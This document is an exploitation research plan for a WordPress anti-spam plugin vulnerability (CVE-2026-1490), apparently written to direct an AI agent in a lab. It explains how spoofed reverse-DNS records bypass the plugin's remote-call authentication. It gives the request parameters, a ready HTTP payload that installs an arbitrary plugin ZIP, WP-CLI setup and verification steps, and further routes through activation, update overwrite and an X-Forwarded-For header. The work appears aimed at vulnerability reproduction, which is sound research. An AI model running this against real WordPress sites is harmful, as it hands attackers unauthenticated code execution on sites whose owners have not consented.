Exploitation Research Plan: CVE-2026-1490 (CleanTalk Anti-Spam)

1. Vulnerability Summary

The Spam protection, Honeypot, Anti-Spam by CleanTalk plugin (<= 6.71) contains an authorization bypass in its remote management logic. Specifically, the function checkWithoutToken (likely located in lib/Cleantalk/ApbctWP/RemoteCalls.php or similar) allows administrative actions—including arbitrary plugin installation—if the request originates from an IP address whose Reverse DNS (PTR record) matches a CleanTalk-associated domain (e.g., *.cleantalk.org).

Because PTR records are controlled by the owner of the IP address, an attacker can set a PTR record for their own server to spoof a CleanTalk identity. This vulnerability is critical because it allows unauthenticated Remote Code Execution (RCE) via the installation of a second vulnerable plugin or a malicious "plugin" zip, provided the target site has an invalid or unconfigured API key.

2. Attack Vector Analysis

• Endpoint: The plugin listens for "Remote Calls" via the init or plugins_loaded hook. This is usually triggered by a specific GET/POST parameter like cleantalk_remote_call or spbc_remote_call.
• Action: The target action is install_plugin or update_plugin.
• Authentication: Unauthenticated. The bypass relies on IP identity verification via gethostbyaddr().
• Precondition: The WordPress option cleantalk_settings must contain an invalid/empty API key, or the plugin must be in a state where it falls back to the checkWithoutToken logic.

3. Code Flow

1. Entry Point: Cleantalk\ApbctWP\RemoteCalls::check() (inferred) is called during the init hook.
2. Request Detection: The plugin checks if $_GET['cleantalk_remote_call'] (or a similar parameter) is set.
3. Authentication Attempt:
   • It first tries to validate the request using the ct_api_key.
   • If the key is invalid or missing, it calls checkWithoutToken().
4. The Vulnerability (Sink): Inside checkWithoutToken():
   • The code retrieves the visitor's IP: $ip = $_SERVER['REMOTE_ADDR'];.
   • It performs a reverse DNS lookup: $host = gethostbyaddr($ip);.
   • It checks if $host matches a pattern: if ( preg_match('/cleantalk\.org$/', $host) ) { return true; }.
5. Privileged Action: If true is returned, the plugin proceeds to execute the action specified in the action parameter (e.g., install_plugin).
6. Plugin Installation: The plugin likely uses the WP_Ajax_Upgrader_Skin and Plugin_Upgrader classes to download and install a plugin from a provided URL.

4. Nonce Acquisition Strategy

This vulnerability does not require a nonce.
The CleanTalk remote management system is designed to be called by external CleanTalk servers via API. Since these external servers do not have access to the WordPress site's session cookies or nonce secrets, the remote management endpoints bypass standard WordPress CSRF (nonce) and Capability checks in favor of API Key or IP-based validation. The checkWithoutToken function is the specific bypass for these checks.

5. Exploitation Strategy

Environment Setup

To successfully test this in a lab environment, the gethostbyaddr() call must return a cleantalk.org domain. Since we cannot easily control global DNS in the test container:

• Simulate PTR: The agent should identify the container's IP and add an entry to the local DNS resolver (if possible) or, more practically for a PoC, use a filter/mock if the plugin provides one.
• Mocking for PoC: If DNS cannot be spoofed, the agent can temporarily modify the plugin code to return a hardcoded trusted IP or force checkWithoutToken to return true.

Exploit Steps

1. Step 1: Invalidate API Key. Ensure the plugin is active but has an invalid key.

   wp option update cleantalk_settings '{"apikey":"invalid_key"}' --format=json
   

2. Step 2: Craft the Installation Request.
   The request must target the remote call handler with an installation payload.

   • Action: install_plugin
   • Plugin URL: A URL to a plugin ZIP (e.g., Hello Dolly from WordPress SVN).

3. HTTP Request (Mocking the Spoof):
   The agent will send a POST request.

   • URL: http://localhost:8080/
   • Method: POST
   • Parameters:
     • cleantalk_remote_call=install_plugin
     • plugin_url=https://downloads.wordpress.org/plugin/hello-dolly.1.7.2.zip
     • api_key=invalid_key (to trigger the fallback)

   Example http_request payload:

   {
     "method": "POST",
     "url": "http://localhost:8080/index.php?cleantalk_remote_call=install_plugin",
     "headers": {
       "Content-Type": "application/x-www-form-urlencoded"
     },
     "data": "plugin_url=https%3A%2F%2Fdownloads.wordpress.org%2Fplugin%2Fhello-dolly.1.7.2.zip"
   }
   

6. Test Data Setup

1. Target Plugin: Install cleantalk-spam-protect version 6.71.
2. Configuration:
   • Set ct_api_key to an empty string or 12345.
   • Ensure Remote Management features are enabled (usually default).
3. Network Mock: (Crucial) The agent must ensure the IP from which it sends the request is "seen" as a CleanTalk host. Since http_request runs from the host, the agent should check what $_SERVER['REMOTE_ADDR'] is inside the container and ensure that IP's reverse lookup works or is mocked.

7. Expected Results

• The HTTP response should return a JSON object indicating success: {"success": true} or {"status": "OK"}.
• The file wp-content/plugins/hello-dolly/hello.php should be created.
• The plugin hello-dolly should appear in the active plugins list (if the remote call also handles activation).

8. Verification Steps

After sending the exploit request, verify via WP-CLI:

# Check if the plugin was installed
wp plugin is-installed hello-dolly && echo "Installation Successful"

# Check if the plugin was activated (if targeted)
wp plugin status hello-dolly

9. Alternative Approaches

• Action plugin_activate: If the plugin is already installed but inactive, attempt to activate it via cleantalk_remote_call=plugin_activate&plugin=hello-dolly/hello.php.
• Action update_plugin: If an older version of a plugin is installed, use the update mechanism to overwrite it with a different ZIP.
• X-Forwarded-For Bypass: Check if the plugin uses Cleantalk\ApbctWP\Helper::ip__get() to determine the IP. If it respects HTTP_X_FORWARDED_FOR, the PTR spoofing becomes trivial by setting that header to a known CleanTalk IP (e.g., 1.1.1.1 if it has a PTR record) and spoofing the result of a local lookup if the container environment allows.